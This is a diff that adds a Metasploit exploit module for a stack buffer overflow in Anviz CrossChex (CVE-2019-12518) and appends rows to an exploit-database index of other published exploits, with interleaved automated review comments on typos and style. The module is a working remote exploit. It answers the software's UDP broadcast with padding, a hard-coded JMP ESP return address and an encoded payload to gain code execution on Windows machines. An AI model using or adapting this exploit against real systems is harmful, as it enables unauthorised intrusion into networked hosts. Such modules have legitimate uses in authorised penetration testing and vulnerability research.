@@ -0,0 +1,82 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + PACKET_LEN = 10 + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Anviz CrossChex Buffer Overflow', + 'Description' => %q{ + Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, + triggering a stack buffer overflow. + }, + 'Author' => + [ + 'Luis Catarino ', # original discovery/exploit + 'Pedro Rodrigues ', # original discovery/exploit + 'agalway-r7', # Module creation + 'adfoster-r7' # Module creation + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2019-12518'], + ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'], + ['EDB', '47734'] + ], + 'Payload' => + { + 'Space' => 8947, + 'DisableNops' => true + }, + 'Arch' => ARCH_X86, + 'EncoderType' => Msf::Encoder::Type::Raw, + 'Privileged' => true, + 'Platform' => 'win', + 'DisclosureDate' => '2019-11-28', + 'Targets' => + [ + [ + 'Crosschex Standard x86 <= V4.3.12', + { + 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten + 'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data + 'Shift' => 4 # Positions payload to be written at beginning of ESP + } + ] + ], + 'DefaultTarget' => 0 + )) + deregister_udp_options + register_options( + [ + Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'), + Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'), + OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 
0 or less waits indefinitely.', 100]) + ]) + end + + def exploit + connect_udp + + res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil)) + if res.empty? + fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast") + end + + print_status "CrossChex broadcast received, sending payload in response" + sploit = rand_text_english(target['Offset']) + sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data + sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP + sploit << payload.encoded + + udp_sock.sendto(sploit, host, port) + print_status "Payload sent" + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 36ca67a50..4625ad9a7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
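Review bot: The module's `'Description'` reads `Ainz CrossChex` while the `'Name'` and the index entry say `Anviz CrossChex`; fix the typo so searches on the vendor name also hit the description. In `exploit`, `datastore["TIMEOUT"].to_i` is evaluated twice inside a nested ternary; `timeout = datastore['TIMEOUT'].to_i` followed by `res, host, port = udp_sock.recvfrom(PACKET_LEN, timeout > 0 ? timeout : nil)` reads more clearly and matches the single-quote style used in `initialize`. The `res.empty?` check assumes the UDP mixin's `recvfrom` returns an empty string rather than `nil` on timeout — worth confirming, otherwise the timeout path raises `NoMethodError` instead of reaching the intended `fail_with`.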
@@ -10963,6 +10963,12 @@ id,file,description,date,author,type,platform,port
 48070,exploits/windows/local/48070.txt,"SprintWork 2.3.1 - Local Privilege Escalation",2020-02-14,boku,local,windows,
 48071,exploits/windows/local/48071.md,"Windows Kernel - Information Disclosure",2020-01-27,Bitdefender,local,windows,
 48072,exploits/php/local/48072.php,"PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass",2020-01-30,mm0r1,local,php,
+48075,exploits/windows/local/48075.txt,"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path",2020-02-17,"Roberto Piña",local,windows,
+48078,exploits/windows/local/48078.txt,"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path",2020-02-17,boku,local,windows,
+48079,exploits/windows/local/48079.txt,"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation",2020-02-17,nu11secur1ty,local,windows,
+48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
+48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
+48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
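Review bot: The description for 48087 is `Cuckoo Clock v5.0 - Buffer Overflow` while the file header in the 48087.py hunk reads `Cuckoo Clock 5.0`, and no other entry in this hunk prefixes the version with `v`; drop the `v` for consistency with the file and its neighbours. The third hunk of this file (48074–48090) has a more consequential mismatch of the same kind: 48076 is indexed as `Strong Testimonials 2.40.1` although the entry's header gives the affected range as `2.40.0 and below` and its timeline names 2.40.1 as the release containing the fix, so the index currently labels the patched version as vulnerable; that description should read `2.40.0`.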
@@ -17999,6 +18005,7 @@ id,file,description,date,author,type,platform,port
 48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
 48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd,
 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
+48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42358,3 +42365,11 @@ id,file,description,date,author,type,platform,port
 48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
 48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php,
 48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
+48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
+48076,exploits/php/webapps/48076.txt,"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php,
+48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware,
+48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
+48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ashkan Moghaddas",webapps,php,
+48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
+48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
+48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,